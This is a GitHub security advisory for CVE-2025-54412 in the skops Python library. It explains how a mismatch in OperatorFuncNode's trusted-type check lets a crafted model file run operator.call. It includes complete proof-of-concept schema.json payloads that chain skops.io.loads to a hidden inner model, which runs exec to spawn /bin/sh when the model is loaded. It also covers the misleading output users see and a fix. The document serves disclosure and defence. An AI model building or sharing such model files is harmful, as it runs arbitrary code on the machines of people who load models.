ghsa-m7f4-hrc6-fwg3
Vulnerability from github
Summary
An inconsistency in OperatorFuncNode
can be exploited to hide the execution of untrusted operator.xxx
methods. This can then be used in a code reuse attack to invoke seemingly safe functions and escalate to arbitrary code execution with minimal and misleading trusted types.
Note: This report focuses on operator.call
as it appears to be the most interesting target, but the same technique applies to other operator
methods. Moreover, focusing on a specific example is not necessary, the operator.call
invocation was a zero-effort choice meant solely to demonstrate the issue. The key point is the inconsistency that allows a user to approve a type as trusted, while in reality enabling the execution of operator.xxx
.
Details
The OperatorFuncNode
allows calling methods belonging to the operator
module and included in a trusted list of methods. However, what is returned by get_untrusted_types
and checked during the load
call is not exactly the same as what is actually called. Instead, it is something partially controlled by the model author. This means that the user checking the untrusted types can be tricked into thinking something benign is being used, while in reality the operator.xxx
method is executed.
Let’s look at the implementation of the OperatorFuncNode
:
```python
from io/_general.py:618-633
class OperatorFuncNode(Node): def init( self, state: dict[str, Any], load_context: LoadContext, trusted: Optional[Sequence[str]] = None, ) -> None: super().init(state, load_context, trusted) self.trusted = self._get_trusted(trusted, []) self.children["attrs"] = get_tree(state["attrs"], load_context, trusted=trusted)
def _construct(self):
op = getattr(operator, self.class_name)
attrs = self.children["attrs"].construct()
return op(*attrs)
```
As you can see, what is called during construction is operator.class_name
, where class_name
is the value of the "__class__"
key in the schema.json
file of the model.skops
. However, what is returned by get_untrusted_types
and checked during load
is the concatenation of the __module__
and __class__
keys. Interestingly, __module__
is not used in the construction of the OperatorFuncNode
, allowing an attacker to forge a module name that, when concatenated with the __class__
name, seems harmless and related to the model being loaded, while actually calling the operator.class_name
function.
For example, an attacker can create a schema.json
file with the following content:
json
{
"__class__": "call",
"__module__": "sklearn.linear_model._stochastic_gradient.SGDRegressor",
"__loader__": "OperatorFuncNode",
...
}
What is returned by get_untrusted_types
and checked during load
is "sklearn.linear_model._stochastic_gradient.SGDRegressor.call"
, which seems harmless and related to the model being loaded. However, what is actually called during the construction of the OperatorFuncNode
is operator.call
, which can be used to call arbitrary functions with the provided arguments.
NOTE: There is also the possibility of a collision with a real method ending with .call
. If, at some point, the user needs to trust a type like something.somewhere.call
, then the attacker can use the same name while actually executing operator.call
. This also means that, if at any point skops
adds a default trusted element named call
, the attacker can use it to execute arbitrary code by invoking operator.call
with the provided arguments.
PoC
As an example, to create a model that seems perfectly harmless but allows fully arbitrary code execution, reuse code of the skops.io.loads
function from the skops
library. This function was chosen because, even though it is not in the default trusted list of skops
, it appears perfectly harmless and appropriate in the context of loading a model with skops
, hence it is likely to be trusted by users.
In particular, the OperatorFuncNode
is combined with the skops.io.loads
function to create a model (model.skops
) that, when loaded, executes a second model load using another, hidden model zipped into the original model.skops
file (hence not visible to the user unless manually unzipped and inspected). The second model is loaded with controlled arguments, allowing the attacker to specify any trusted list, thereby enabling arbitrary code execution.
Zip file structure
The zip file model.skops
has the following structure:
model.skops
├── schema.json
├── my-model-evil.skops
└── schema.json
Payload
The schema.json
file of model.skops
is as follows:
json
{
"__class__": "call",
"__module__": "sklearn.linear_model._stochastic_gradient.SGDRegressor",
"__loader__": "OperatorFuncNode",
"attrs": {
"__class__": "tuple",
"__module__": "builtins",
"__loader__": "TupleNode",
"content": [
{
"__class__": "loads",
"__module__": "skops.io",
"__loader__": "TypeNode",
"__id__": 5
},
{
"__class__": "bytes",
"__module__": "builtins",
"__loader__": "BytesNode",
"file": "my-model-evil.skops",
"__id__": 6
},
{
"__class__": "list",
"__module__": "builtins",
"__loader__": "ListNode",
"content": [
{
"__class__": "str",
"__module__": "builtins",
"__loader__": "JsonNode",
"content": "\"builtins.exec\""
},
{
"__class__": "str",
"__module__": "builtins",
"__loader__": "JsonNode",
"content": "\"sk.call\""
}
]
}
],
"__id__": 8
},
"__id__": 10,
"protocol": 2,
"_skops_version": "0.11.0"
}
Inside the zip file model.skops
, there is a file my-model-evil.skops
with the following content:
json
{
"__class__": "call",
"__module__": "sk",
"__loader__": "OperatorFuncNode",
"attrs": {
"__class__": "tuple",
"__module__": "builtins",
"__loader__": "TupleNode",
"content": [
{
"__class__": "exec",
"__module__": "builtins",
"__loader__": "TypeNode",
"__id__": 1
},
{
"__class__": "str",
"__module__": "builtins",
"__loader__": "JsonNode",
"content": "\"import os; os.system('/bin/sh')\"",
"__id__": 5,
"is_json": true
}
],
"__id__": 8
},
"__id__": 10,
"protocol": 2,
"_skops_version": "0.11.0"
}
Since the first model loads it, the second model is loaded with the attacker-controlled trusted list ["builtins.exec", "sk.call"]
, allowing execution of the exec
function with the provided argument without any further confirmation from the user. In this example, a shell command is executed, but the attacker can modify the payload to execute any arbitrary code.
What is shown when executing the payload
Suppose a user loads the model with the following code:
```python from skops.io import load, get_untrusted_types
unknown_types = get_untrusted_types(file="model.skops") print("Unknown types", unknown_types) input("Press enter to load the model...") loaded = load("model.skops", trusted=unknown_types) ```
The output will be:
Unknown types ['sklearn.linear_model._stochastic_gradient.SGDRegressor.call', 'skops.io.loads']
Press enter to load the model...
This shows that the user is tricked into believing the model is safe, with apparently legitimate types like sklearn.linear_model._stochastic_gradient.SGDRegressor.call
and skops.io.loads
, while in reality, a shell is executed.
This is just one example, but the same technique can be used to execute any arbitrary code with even more misleading names.
Possible Fix
get_untrusted_types
and load
should verify what is actually called during the construction of the OperatorFuncNode
, not just rely on the concatenation of the __module__
and __class__
keys, which do not reflect the true behavior in this case.
Impact
An attacker can exploit this vulnerability by crafting a malicious model file that, when loaded, requests trusted types that are different from those actually executed by the model. Potentially, this can escalate— as shown— to the execution of arbitrary code on the victim’s machine, requiring only the confirmation of a few seemingly safe types. The attack occurs at load time. This is particularly concerning given that skops
is often used in collaborative environments and promotes a security-oriented policy.
Attachments
The complete PoC is available on GitHub at io-no/CVE-2025-54412.
{ "affected": [ { "package": { "ecosystem": "PyPI", "name": "skops" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.12.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2025-54412" ], "database_specific": { "cwe_ids": [ "CWE-351" ], "github_reviewed": true, "github_reviewed_at": "2025-07-25T19:17:34Z", "nvd_published_at": "2025-07-26T04:16:06Z", "severity": "HIGH" }, "details": "## Summary\nAn inconsistency in `OperatorFuncNode` can be exploited to hide the execution of untrusted `operator.xxx` methods. This can then be used in a code reuse attack to invoke seemingly safe functions and escalate to arbitrary code execution with minimal and misleading trusted types.\n\n**Note:** This report focuses on `operator.call` as it appears to be the most interesting target, but the same technique applies to other `operator` methods. Moreover, focusing on a specific example is not necessary, the `operator.call` invocation was a zero-effort choice meant solely to demonstrate the issue. The key point is the **inconsistency** that allows a user to approve a type as trusted, while in reality enabling the execution of `operator.xxx`.\n\n\n\n## Details\n\nThe `OperatorFuncNode` allows calling methods belonging to the `operator` module and included in a trusted list of methods. However, what is returned by `get_untrusted_types` and checked during the `load` call is not exactly the same as what is actually called. Instead, it is something partially controlled by the model author. This means that the user checking the untrusted types can be tricked into thinking something benign is being used, while in reality the `operator.xxx` method is executed.\n\nLet\u2019s look at the implementation of the `OperatorFuncNode`:\n\n```python\n# from io/_general.py:618-633\nclass OperatorFuncNode(Node):\n def __init__(\n self,\n state: dict[str, Any],\n load_context: LoadContext,\n trusted: Optional[Sequence[str]] = None,\n ) -\u003e None:\n super().__init__(state, load_context, trusted)\n self.trusted = self._get_trusted(trusted, [])\n self.children[\"attrs\"] = get_tree(state[\"attrs\"], load_context, trusted=trusted)\n\n def _construct(self):\n op = getattr(operator, self.class_name)\n attrs = self.children[\"attrs\"].construct()\n return op(*attrs)\n```\n\nAs you can see, what is called during construction is `operator.class_name`, where `class_name` is the value of the `\"__class__\"` key in the `schema.json` file of the `model.skops`. However, what is returned by `get_untrusted_types` and checked during `load` is the concatenation of the `__module__` and `__class__` keys. Interestingly, `__module__` is not used in the construction of the `OperatorFuncNode`, allowing an attacker to forge a module name that, when concatenated with the `__class__` name, seems harmless and related to the model being loaded, while actually calling the `operator.class_name` function.\n\nFor example, an attacker can create a `schema.json` file with the following content:\n\n```json\n{\n \"__class__\": \"call\",\n \"__module__\": \"sklearn.linear_model._stochastic_gradient.SGDRegressor\",\n \"__loader__\": \"OperatorFuncNode\",\n ...\n}\n```\n\nWhat is returned by `get_untrusted_types` and checked during `load` is `\"sklearn.linear_model._stochastic_gradient.SGDRegressor.call\"`, which seems harmless and related to the model being loaded. However, what is actually called during the construction of the `OperatorFuncNode` is `operator.call`, which can be used to call arbitrary functions with the provided arguments.\n\n**NOTE:** There is also the possibility of a collision with a real method ending with `.call`. If, at some point, the user needs to trust a type like `something.somewhere.call`, then the attacker can use the same name while actually executing `operator.call`. This also means that, if at any point `skops` adds a default trusted element named `call`, the attacker can use it to execute arbitrary code by invoking `operator.call` with the provided arguments.\n\n## PoC\n\nAs an example, to create a model that seems perfectly harmless but allows fully arbitrary code execution, reuse code of the `skops.io.loads` function from the `skops` library. This function was chosen because, even though it is not in the default trusted list of `skops`, it appears perfectly harmless and appropriate in the context of loading a model with `skops`, hence it is likely to be trusted by users.\n\nIn particular, the `OperatorFuncNode` is combined with the `skops.io.loads` function to create a model (`model.skops`) that, when loaded, executes a second model load using another, hidden model zipped into the original `model.skops` file (hence not visible to the user unless manually unzipped and inspected). The second model is loaded with controlled arguments, allowing the attacker to specify any trusted list, thereby enabling arbitrary code execution.\n\n### Zip file structure\n\nThe zip file `model.skops` has the following structure:\n\n```\nmodel.skops\n\u251c\u2500\u2500 schema.json\n\u251c\u2500\u2500 my-model-evil.skops\n \u2514\u2500\u2500 schema.json\n```\n\n### Payload\n\nThe `schema.json` file of `model.skops` is as follows:\n\n```json\n{\n \"__class__\": \"call\",\n \"__module__\": \"sklearn.linear_model._stochastic_gradient.SGDRegressor\",\n \"__loader__\": \"OperatorFuncNode\",\n \"attrs\": {\n \"__class__\": \"tuple\",\n \"__module__\": \"builtins\",\n \"__loader__\": \"TupleNode\",\n \"content\": [\n {\n \"__class__\": \"loads\",\n \"__module__\": \"skops.io\",\n \"__loader__\": \"TypeNode\",\n \"__id__\": 5\n },\n {\n \"__class__\": \"bytes\",\n \"__module__\": \"builtins\",\n \"__loader__\": \"BytesNode\",\n \"file\": \"my-model-evil.skops\",\n \"__id__\": 6\n },\n {\n \"__class__\": \"list\",\n \"__module__\": \"builtins\",\n \"__loader__\": \"ListNode\",\n \"content\": [\n {\n \"__class__\": \"str\",\n \"__module__\": \"builtins\",\n \"__loader__\": \"JsonNode\",\n \"content\": \"\\\"builtins.exec\\\"\"\n },\n {\n \"__class__\": \"str\",\n \"__module__\": \"builtins\",\n \"__loader__\": \"JsonNode\",\n \"content\": \"\\\"sk.call\\\"\"\n }\n ]\n }\n ],\n \"__id__\": 8\n },\n \"__id__\": 10,\n \"protocol\": 2,\n \"_skops_version\": \"0.11.0\"\n}\n```\n\nInside the zip file `model.skops`, there is a file `my-model-evil.skops` with the following content:\n\n```json\n{\n \"__class__\": \"call\",\n \"__module__\": \"sk\",\n \"__loader__\": \"OperatorFuncNode\",\n \"attrs\": {\n \"__class__\": \"tuple\",\n \"__module__\": \"builtins\",\n \"__loader__\": \"TupleNode\",\n \"content\": [\n {\n \"__class__\": \"exec\",\n \"__module__\": \"builtins\",\n \"__loader__\": \"TypeNode\",\n \"__id__\": 1\n },\n {\n \"__class__\": \"str\",\n \"__module__\": \"builtins\",\n \"__loader__\": \"JsonNode\",\n \"content\": \"\\\"import os; os.system(\u0027/bin/sh\u0027)\\\"\",\n \"__id__\": 5,\n \"is_json\": true\n }\n ],\n \"__id__\": 8\n },\n \"__id__\": 10,\n \"protocol\": 2,\n \"_skops_version\": \"0.11.0\"\n}\n```\n\nSince the first model loads it, the second model is loaded with the attacker-controlled trusted list `[\"builtins.exec\", \"sk.call\"]`, allowing execution of the `exec` function with the provided argument without any further confirmation from the user. In this example, a shell command is executed, but the attacker can modify the payload to execute any arbitrary code.\n\n### What is shown when executing the payload\n\nSuppose a user loads the model with the following code:\n\n```python\nfrom skops.io import load, get_untrusted_types\n\nunknown_types = get_untrusted_types(file=\"model.skops\")\nprint(\"Unknown types\", unknown_types)\ninput(\"Press enter to load the model...\")\nloaded = load(\"model.skops\", trusted=unknown_types)\n```\n\nThe output will be:\n\n```\nUnknown types [\u0027sklearn.linear_model._stochastic_gradient.SGDRegressor.call\u0027, \u0027skops.io.loads\u0027]\nPress enter to load the model...\n```\n\nThis shows that the user is tricked into believing the model is safe, with apparently legitimate types like `sklearn.linear_model._stochastic_gradient.SGDRegressor.call` and `skops.io.loads`, while in reality, a shell is executed.\n\n**This is just one example, but the same technique can be used to execute any arbitrary code with even more misleading names.**\n\n### Possible Fix\n\n`get_untrusted_types` and `load` should verify what is actually called during the construction of the `OperatorFuncNode`, not just rely on the concatenation of the `__module__` and `__class__` keys, which do not reflect the true behavior in this case.\n\n## Impact\nAn attacker can exploit this vulnerability by crafting a malicious model file that, when loaded, requests trusted types that are different from those actually executed by the model. Potentially, this can escalate\u2014 as shown\u2014 to the execution of arbitrary code on the victim\u2019s machine, requiring only the confirmation of a few seemingly safe types. The attack occurs at load time. This is particularly concerning given that `skops` is often used in collaborative environments and promotes a security-oriented policy.\n\n\n\n## Attachments\nThe complete PoC is available on GitHub at [io-no/CVE-2025-54412](https://github.com/io-no/CVE-Reports/tree/main/CVE-2025-54412).", "id": "GHSA-m7f4-hrc6-fwg3", "modified": "2025-07-29T23:34:26Z", "published": "2025-07-25T19:17:34Z", "references": [ { "type": "WEB", "url": "https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54412" }, { "type": "WEB", "url": "https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603" }, { "type": "WEB", "url": "https://drive.google.com/file/d/1c2KrjayE_S1siaou0vDmGK7_MQ7_YCUZ/view?usp=sharing" }, { "type": "WEB", "url": "https://github.com/io-no/CVE-Reports/tree/main/CVE-2025-54412" }, { "type": "PACKAGE", "url": "https://github.com/skops-dev/skops" }, { "type": "WEB", "url": "https://github.com/skops-dev/skops/releases/tag/v0.12.0" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H", "type": "CVSS_V4" } ], "summary": "Skops has Inconsistent Trusted Type Validation that Enables Hidden `operator` Methods Execution" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.